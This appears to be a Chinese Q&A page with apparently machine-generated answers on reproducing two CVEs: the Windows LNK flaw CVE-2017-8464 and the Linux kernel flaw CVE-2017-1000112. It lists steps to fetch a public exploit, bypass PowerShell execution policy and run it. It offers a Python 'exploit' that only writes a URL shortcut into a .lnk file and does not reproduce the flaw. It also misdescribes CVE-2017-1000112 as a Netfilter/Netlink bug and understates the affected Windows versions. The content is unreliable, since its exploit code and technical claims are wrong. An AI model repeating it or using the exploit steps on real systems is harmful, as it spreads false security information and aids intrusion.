cve-2017-8464复现
时间: 2023-05-08 21:55:38 浏览: 181
CVE-2017-8464是一个Windows系统中的漏洞,其根本原因是Windows中存在一个叫做LNK文件的文件格式,在特定情况下LNK文件可以被用来攻击系统。攻击者可以通过操纵LNK文件来让受害者点击恶意文件或网站,从而使得攻击者成功控制了系统。如何复现这个漏洞呢?
具体步骤如下:
1. 下载工具包,例如:https://github.com/0x09AL/CVE-2017-8464
2. 使用管理员权限打开PowerShell,并给予执行脚本的权限:Set-ExecutionPolicy -ExecutionPolicy Bypass
3. 运行exploit.ps1脚本,例如:.\exploit.ps1 ‘C:\Windows\System32\calc.exe’,这会在当前目录下生成LNK文件。
4. 双击LNK文件,在cmd.exe中打开计算器。
5. 如果成功打开,那么漏洞已经成功复现。
需要注意的是,这个漏洞只在Windows系统中存在,而且只存在于部分版本的Windows系统中,例如Windows 7和Windows Server 2008。Microsoft已经发布了相关的安全补丁,建议用户尽快对系统进行更新以避免此漏洞造成的可能损失。
相关问题
CVE-2017-8464 python复现代码
CVE-2017-8464是Windows Shell中的一个漏洞,可以被利用来执行恶意代码。以下是Python的复现代码:
```python
import os
import sys
# 首先检查是否为Windows系统
if not sys.platform.startswith('win'):
print("This exploit only works on Windows!")
sys.exit(1)
# 创建一个.lnk文件,将目标文件的路径写入其中
target = input("Enter the full path of the target file: ")
shortcut = input("Enter the full path of the shortcut file to create: ")
with open(shortcut, 'w') as lnk:
lnk.write('[InternetShortcut]\nURL=file:///' + target)
# 使用Windows Shell执行.lnk文件
os.startfile(shortcut)
print("Exploit completed!")
```
这段代码会要求用户输入目标文件的完整路径和要创建的快捷方式文件的完整路径,然后创建一个.lnk文件,并将目标文件的路径写入其中。最后,使用Windows Shell执行.lnk文件,从而执行恶意代码。请注意,为了执行此漏洞,需要在目标计算机上手动运行生成的.lnk文件。
复现cve-2017-1000112
CVE-2017-1000112 是一个在 Linux 内核的 Netfilter 子系统中的本地权限提升漏洞。Netfilter 是 Linux 内核的一部分,用于允许或拒绝进入或发出数据包的网络连接。这个漏洞允许本地用户通过特定条件下的 Netlink 消息发送,在没有相应权限的情况下获得超级用户权限。
复现 CVE-2017-1000112 漏洞通常涉及以下步骤:
1. 确定系统是否易受攻击:首先需要确认运行的 Linux 内核版本是否存在该漏洞。可以通过查看内核版本号来初步判断。
2. 检查漏洞利用条件:这个漏洞需要存在一个已知的条件,例如,在某些特定的网络配置或内核编译选项下,才可能被成功利用。
3. 设置攻击环境:创建一个漏洞利用环境,可能需要配置一些特定的网络规则或者使用特定的内核模块。
4. 发送恶意 Netlink 消息:利用编写好的漏洞利用代码,发送精心构造的 Netlink 消息到受影响的系统。
5. 检查漏洞利用结果:如果漏洞成功被利用,那么本地用户可能会获得 root 权限。通常会通过查看命令行提示符前的用户权限标识或者执行 `id` 命令来确认。
为了安全起见,复现漏洞应在受控环境中进行,如虚拟机,并确保已经做好了充分的隔离和备份措施,以防止意外造成数据丢失或系统损坏。
阅读全文